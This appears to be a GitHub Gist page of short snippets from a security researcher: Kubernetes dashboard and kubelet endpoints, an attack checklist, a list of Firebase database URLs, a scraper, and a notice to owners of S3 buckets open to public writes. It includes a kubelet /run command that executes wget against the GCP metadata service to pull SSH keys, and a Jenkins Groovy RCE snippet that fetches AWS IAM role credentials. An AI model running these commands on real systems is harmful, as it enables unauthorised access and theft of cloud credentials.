Instantly share code, notes, and snippets.

View censys.md
POST /api/v1/search/ipv4 HTTP/1.1
Host: censys.io
Authorization: Basic A
User-Agent: curl/7.52.1
Accept: */*
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 128
View Kube-API.MD

List Default Name Space

/api/v1/overview/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp

List Secrets

/api/v1/secret/default?filterBy=&itemsPerPage=10&name=&page=1&sortBy=d,creationTimestamp 
View filter.py
import os, fnmatch
import re
import shutil
folder = "/home/host/MyBinaryEdge/kube/cfg/"
View attack list.txt
1) Can scan for production systems
2) Can you access docker reg?
3) can you push a image to reg?
4) Grab IAM / token from metadata
5) check access levels
View btsportepg.py
import requests
session = requests.Session()
headers = {"Origin":"https://sport.bt.com","Accept":"application/json, text/plain, */*","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0","Referer":"https://sport.bt.com/","Connection":"close","If-Modified-Since":"Mon, 22 Oct 2018 14:55:02 GMT","Accept-Language":"en-GB,en;q=0.5","Accept-Encoding":"gzip, deflate"}
response = session.get("https://epg.cdn.vision.bt.com/JSON/all", headers=headers)
print("Status code: %i" % response.status_code)
print("Response body: %s" % response.content)
View timeout.go
package main
import (
"context"
"crypto/tls"
"log"
"net/http"
"time"
)
View firebase.txt
https://13.firebaseio.com/.json
https://20.firebaseio.com/.json
https://33.firebaseio.com/.json
https://35.firebaseio.com/.json
https://4.2.2.1.firebaseio.com/.json
https://4gym.firebaseio.com/.json
https://52.firebaseio.com/.json
https://60.firebaseio.com/.json
https://7617071162.corona.firebaseio.com/.json
https://8.firebaseio.com/.json
View google-kube.md

Retrive Public SSH keys from google metadata

Request

curl -sk https://IP:10250/run/NAMESPACE/POD/CONTAINERNAME -d "busybox wget -q -O - --header='Metadata-Flavor: Google' http://metadata/computeMetadata/v1/project/attributes/ssh-keys?alt=json"
View jenkins.md

Jenkins Groovy RCE Commands

AWS IAM ROLE KEYS

def command = "wget -q -O - http://169.254.169.254/latest/meta-data/iam/security-credentials/"
   def proc = command.execute()
View s3-pwn.md

If you are reading this then there is a chance you have a poc.txt in your s3 bucket.

This is just a little heads up to say attackers can upload and overwrite files in your s3 bucket and if you are serving up files like JS they can add an XSS or coinhive to your js.

If you login to your AWS console find the bucket please remove the public-write permission from the bucket and this will fix the issue.

How to test a s3 bucket for bad permissions